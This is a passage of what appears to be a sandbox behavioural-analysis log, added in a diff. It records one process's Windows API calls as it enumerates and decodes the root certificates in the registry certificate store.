"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\0119E81BE9A14CD8E22F40AC118C687ECBA3F4D8" + } + ], + "repeated": 0, + "id": 1477 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000540" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\0119E81BE9A14CD8E22F40AC118C687ECBA3F4D8\\Blob" + } + ], + "repeated": 1, + "id": 1478 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000540" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x10\\x00\\x00|\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xfc\\x02\\xa4\\x9e.\\x1e\\x8eH\\x8c\\xa2\\x91!5W,\\xc2\\xf8\\xe7\\x1b\\xb0\\xe2\\xf2\\x85\\x96\\xb3r\"\\x99\\xf5\\xcb\\x9cb\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x84's\\x95\\x00\\x86\\xd0k\\x04\\xd7\\x02-b\\xa2\\x84\\xbek\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00e\\xaf\\x95\\xf4\\xbe\\x86\\x84sDcB\\x82\\xf9A\\xb2\\xe6\\x05\\x06>\\xf0\\xc8T/\\x01L\\xa0\\x88\\xd1\\x82\\x10\\x9eO\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00j\\x00\\x00\\x00M\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00T\\x00i\\x00m\\x00e\\x00 \\x00S\\x00t\\x00a\\x00m\\x00p\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00C\\x00e\\x00r\\x00t\\x00i\\x00f\\x00i\\x00c\\x00a\\x00t\\x00e\\x00 \\x00A\\x00u\\x00t\\x00h\\x00o\\x00r\\x00i\\x00t\\x00y\\x00 \\x002\\x000\\x001\\x004\\x00\\x00\\x00i\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0e\\x00\\x00\\x000\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x03\\x02\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x01\\x19\\xe8\\x1b\\xe9\\xa1L\\xd8\\xe2/@\\xac\\x11\\x8ch~\\xcb\\xa3\\xf4\\xd8\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x004\\xf7&\\x98\\xd7\\x0e#\\x1f\\x8d\\xc4[W\\xf1\\x18\\xa4K\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xe4\\xa2\\xf6\\xfe\\x9c\\xa7\\xf1\\x8a+\\xeb\\xa9aa0\\x8b\\xaa\\x88\\x80\\xb0\\x13\\x16\\x1d\\xdd\\x852\\xd4%\\x9e'\\xe5\\x05p\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xcb\\xd1\\xf2\\xceH\\xfd\\x01\\x9f\\xeaV\\xaaW\\xd1~\\x99X\\xf8?\\xff\\xe0Y\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x16\\x00\\x00\\x00R\\x00S\\x00A\\x00/\\x00S\\x00H\\x00A\\x002\\x005\\x006\\x00\\x00\\x00 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x07\\x06\\x00\\x000\\x82\\x06\\x030\\x82\\x03\\xeb\\xa0\\x03\\x02\\x01\\x02\\x02\\x10/\\xd6zC\"\\x932\\x90E\\xe9S4>\\xe2tf0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x0b\\x05\\x000\\x81\\x931\\x0b0\t\\x06" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\0119E81BE9A14CD8E22F40AC118C687ECBA3F4D8\\Blob" + } + ], + "repeated": 0, + "id": 1479 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000540" + } + ], + "repeated": 0, + "id": 1480 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x0055b000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1481 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x767f770e", + "parentcaller": "0x767ef4e2", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x06\\x030\\x82\\x03\\xeb\\xa0\\x03\\x02\\x01\\x02\\x02\\x10/\\xd6zC\"\\x932\\x90E\\xe9S4>\\xe2tf0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x0b\\x05\\x000\\x81\\x931\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x130\\x11\\x06\\x03U\\x04\\x08\\x13\nWashington1\\x100\\x0e\\x06\\x03U\\x04\\x07\\x13\\x07Redmond1\\x1e0\\x1c\\x06\\x03U\\x04\n\\x13\\x15Microsoft Corporation1=0;\\x06\\x03U\\x04\\x03\\x134Microsoft Time Stamp Root Certificate Authority 20140\\x1e\\x17\r141022220857Z\\x17\r391022221519Z0\\x81\\x931\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x130\\x11\\x06\\x03U\\x04\\x08\\x13\nW" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 1482 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000053c" + }, + { + "name": "Index", + "value": "1" + } + ], + "repeated": 0, + "id": 1483 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000540" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000053c" + }, + { + "name": "ObjectAttributesName", + "value": "06F1AA330B927B753A40E68CDF22E34BCBEF3352" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\06F1AA330B927B753A40E68CDF22E34BCBEF3352" + } + ], + "repeated": 0, + "id": 1484 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000540" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\06F1AA330B927B753A40E68CDF22E34BCBEF3352\\Blob" + } + ], + "repeated": 1, + "id": 1485 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000540" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "Y\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x1a\\x00\\x00\\x00E\\x00C\\x00D\\x00S\\x00A\\x00/\\x00S\\x00H\\x00A\\x003\\x008\\x004\\x00\\x00\\x00\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00}\\x9e}\\x1e\\x8d]\\xa1\\x1d\\xc0\\xc8K\\x07W\\xec\\xed\\xcb\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x002\\x99\\x19\\x81\\xbf\\x15u\\xa1\\xa50;\\xb9:8\\x17#\\xea4k\\x9e\\xc10\\xfd\\xb5\\x96\\xa7[\\xa1\\xd7\\xce\\x0b\n\\x06W\\x0b\\xb9\\x85\\xd2XA\\xe2;\\xe9D\\xe8\\xff\\x11\\x8f\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00l\\x00\\x00\\x00M\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00E\\x00C\\x00C\\x00 \\x00P\\x00r\\x00o\\x00d\\x00u\\x00c\\x00t\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00C\\x00e\\x00r\\x00t\\x00i\\x00f\\x00i\\x00c\\x00a\\x00t\\x00e\\x00 \\x00A\\x00u\\x00t\\x00h\\x00o\\x00r\\x00i\\x00t\\x00y\\x00 \\x002\\x000\\x001\\x008\\x00\\x00\\x00i\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0e\\x00\\x00\\x000\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x03\\x02\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x06\\xf1\\xaa3\\x0b\\x92{u:@\\xe6\\x8c\\xdf\"\\xe3K\\xcb\\xef3R\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x1f\\x12N\\xde\\x13\\xe0j\\x02<\\xd7\\xc0\\x9aOH\\xc3\\xd6\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00C\\xefp\\x87\\xb8\\x9d\\xbf\\xec\\x88\\x19\\xdc\\xc6\\xc4ku\ru43\\x08\\\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x80\\x01\\x00\\x00 \\x00\\x00\\x00\\x01\\x00\\x00\\x00'\\x03\\x00\\x000\\x82\\x03#0\\x82\\x02\\xa8\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x14\\x98&f\\xdc|\\xcd\\x8f@Sg{\\xb9\\x99\\xec\\x850\n\\x06\\x08*\\x86H\\xce=\\x04\\x03\\x030\\x81\\x941\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x130\\x11\\x06\\x03U\\x04\\x08\\x13\nWashington1\\x100\\x0e\\x06\\x03U\\x04\\x07\\x13\\x07Redmond1\\x1e0\\x1c\\x06\\x03U\\x04\n\\x13\\x15Microsoft C" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\06F1AA330B927B753A40E68CDF22E34BCBEF3352\\Blob" + } + ], + "repeated": 0, + "id": 1486 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000540" + } + ], + "repeated": 0, + "id": 1487 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x767f770e", + "parentcaller": "0x767ef4e2", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x03#0\\x82\\x02\\xa8\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x14\\x98&f\\xdc|\\xcd\\x8f@Sg{\\xb9\\x99\\xec\\x850\n\\x06\\x08*\\x86H\\xce=\\x04\\x03\\x030\\x81\\x941\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x130\\x11\\x06\\x03U\\x04\\x08\\x13\nWashington1\\x100\\x0e\\x06\\x03U\\x04\\x07\\x13\\x07Redmond1\\x1e0\\x1c\\x06\\x03U\\x04\n\\x13\\x15Microsoft Corporation1>0<\\x06\\x03U\\x04\\x03\\x135Microsoft ECC Product Root Certificate Authority 20180\\x1e\\x17\r180227204208Z\\x17\r430227205046Z0\\x81\\x941\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x130\\x11\\x06\\x03U\\x04\\x08\\x13\nWas" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 1488 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000053c" + }, + { + "name": "Index", + "value": "2" + } + ], + "repeated": 0, + "id": 1489 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000540" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000053c" + }, + { + "name": "ObjectAttributesName", + "value": "18F7C1FCC3090203FD5BAA2F861A754976C8DD25" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\18F7C1FCC3090203FD5BAA2F861A754976C8DD25" + } + ], + "repeated": 0, + "id": 1490 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000540" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\18F7C1FCC3090203FD5BAA2F861A754976C8DD25\\Blob" + } + ], + "repeated": 1, + "id": 1491 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000540" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xe5=4\\xce\\xcb\\x05\\xc1~\\xe32\\xc7I\\xd7\\x8c\\x02V\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00e\\xfcGR\\x0ff89b\\xec\\x0b{\\x88\\xa0\\x82\\x1d\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x18\\xf7\\xc1\\xfc\\xc3\t\\x02\\x03\\xfd[\\xaa/\\x86\\x1auIv\\xc8\\xdd%\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x000\n\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x004\\x00\\x00\\x00V\\x00e\\x00r\\x00i\\x00S\\x00i\\x00g\\x00n\\x00 \\x00T\\x00i\\x00m\\x00e\\x00 \\x00S\\x00t\\x00a\\x00m\\x00p\\x00i\\x00n\\x00g\\x00 \\x00C\\x00A\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00>\\xdf)\\x0c\\xc1\\xf5\\xccs,\\xeb=$\\xe1~R\\xda\\xbd'\\xe2\\xf0 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xc0\\x02\\x00\\x000\\x82\\x02\\xbc0\\x82\\x02%\\x02\\x10J\\x19\\xd28\\x8c\\x82Y\\x1c\\xa5]s_\\x15]\\xdc\\xa30\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x04\\x05\\x000\\x81\\x9e1\\x1f0\\x1d\\x06\\x03U\\x04\n\\x13\\x16VeriSign Trust Network1\\x170\\x15\\x06\\x03U\\x04\\x0b\\x13\\x0eVeriSign, Inc.1,0*\\x06\\x03U\\x04\\x0b\\x13#VeriSign Time Stamping Service Root1402\\x06\\x03U\\x04\\x0b\\x13+NO LIABILITY ACCEPTED, (c)97 VeriSign, Inc.0\\x1e\\x17\r970512000000Z\\x17\r040107235959Z0\\x81\\x9e1\\x1f0\\x1d\\x06\\x03U\\x04\n\\x13\\x16VeriSign Trust Network1\\x170\\x15\\x06\\x03U\\x04\\x0b\\x13\\x0eVeriSign, I" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\18F7C1FCC3090203FD5BAA2F861A754976C8DD25\\Blob" + } + ], + "repeated": 0, + "id": 1492 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000540" + } + ], + "repeated": 0, + "id": 1493 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x767f770e", + "parentcaller": "0x767ef4e2", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x02\\xbc0\\x82\\x02%\\x02\\x10J\\x19\\xd28\\x8c\\x82Y\\x1c\\xa5]s_\\x15]\\xdc\\xa30\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x04\\x05\\x000\\x81\\x9e1\\x1f0\\x1d\\x06\\x03U\\x04\n\\x13\\x16VeriSign Trust Network1\\x170\\x15\\x06\\x03U\\x04\\x0b\\x13\\x0eVeriSign, Inc.1,0*\\x06\\x03U\\x04\\x0b\\x13#VeriSign Time Stamping Service Root1402\\x06\\x03U\\x04\\x0b\\x13+NO LIABILITY ACCEPTED, (c)97 VeriSign, Inc.0\\x1e\\x17\r970512000000Z\\x17\r040107235959Z0\\x81\\x9e1\\x1f0\\x1d\\x06\\x03U\\x04\n\\x13\\x16VeriSign" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 1494 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000053c" + }, + { + "name": "Index", + "value": "3" + } + ], + "repeated": 0, + "id": 1495 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000540" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000053c" + }, + { + "name": "ObjectAttributesName", + "value": "245C97DF7514E7CF2DF8BE72AE957B9E04741E85" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\245C97DF7514E7CF2DF8BE72AE957B9E04741E85" + } + ], + "repeated": 0, + "id": 1496 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000540" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\245C97DF7514E7CF2DF8BE72AE957B9E04741E85\\Blob" + } + ], + "repeated": 1, + "id": 1497 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000540" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x7f\\xdf\\xf5\\x07)Dg\\x10$JD|\\xa2\\xa1\\x97\\xea\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x9d\\xf0\\xd11\\x00\\x12:\\xec\\xa7p\\x13\\x0fJ\\xd8\\xd2\t\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x002\\x00\\x00\\x00M\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00T\\x00i\\x00m\\x00e\\x00s\\x00t\\x00a\\x00m\\x00p\\x00 \\x00R\\x00o\\x00o\\x00t\\x00\\x00\\x00\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x000\n\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00$\\\\x97\\xdfu\\x14\\xe7\\xcf-\\xf8\\xber\\xae\\x95{\\x9e\\x04t\\x1e\\x85\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x004O0-%i1\\x91\\xea\\xf7s\\\\xab\\xf5\\x86\\x8d7\\x82@\\xec \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xb1\\x02\\x00\\x000\\x82\\x02\\xad0\\x82\\x02\\x16\\x02\\x01\\x010\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x04\\x05\\x000\\x81\\x9e1 0\\x1e\\x06\\x03U\\x04\n\\x13\\x17Microsoft Trust Network1\\x1e0\\x1c\\x06\\x03U\\x04\\x0b\\x13\\x15Microsoft Corporation1-0+\\x06\\x03U\\x04\\x0b\\x13$Microsoft Time Stamping Service Root1+0)\\x06\\x03U\\x04\\x0b\\x13\"Copyright (c) 1997 Microsoft Corp.0\\x1e\\x17\r970513161259Z\\x17\r991230235959Z0\\x81\\x9e1 0\\x1e\\x06\\x03U\\x04\n\\x13\\x17Microsoft Trust Network1\\x1e0\\x1c\\x06\\x03U\\x04\\x0b\\x13\\x15Microsoft Corporation1-0+\\x06\\x03" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\245C97DF7514E7CF2DF8BE72AE957B9E04741E85\\Blob" + } + ], + "repeated": 0, + "id": 1498 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000540" + } + ], + "repeated": 0, + "id": 1499 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x767f770e", + "parentcaller": "0x767ef4e2", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x02\\xad0\\x82\\x02\\x16\\x02\\x01\\x010\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x04\\x05\\x000\\x81\\x9e1 0\\x1e\\x06\\x03U\\x04\n\\x13\\x17Microsoft Trust Network1\\x1e0\\x1c\\x06\\x03U\\x04\\x0b\\x13\\x15Microsoft Corporation1-0+\\x06\\x03U\\x04\\x0b\\x13$Microsoft Time Stamping Service Root1+0)\\x06\\x03U\\x04\\x0b\\x13\"Copyright (c) 1997 Microsoft Corp.0\\x1e\\x17\r970513161259Z\\x17\r991230235959Z0\\x81\\x9e1 0\\x1e\\x06\\x03U\\x04\n\\x13\\x17Microsoft Trust Network" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 1500 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000053c" + }, + { + "name": "Index", + "value": "4" + } + ], + "repeated": 0, + "id": 1501 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000540" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000053c" + }, + { + "name": "ObjectAttributesName", + "value": "31F9FC8BA3805986B721EA7295C65B3A44534274" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\31F9FC8BA3805986B721EA7295C65B3A44534274" + } + ], + "repeated": 0, + "id": 1502 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000540" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\31F9FC8BA3805986B721EA7295C65B3A44534274\\Blob" + } + ], + "repeated": 1, + "id": 1503 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x0055d000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1504 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000540" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": 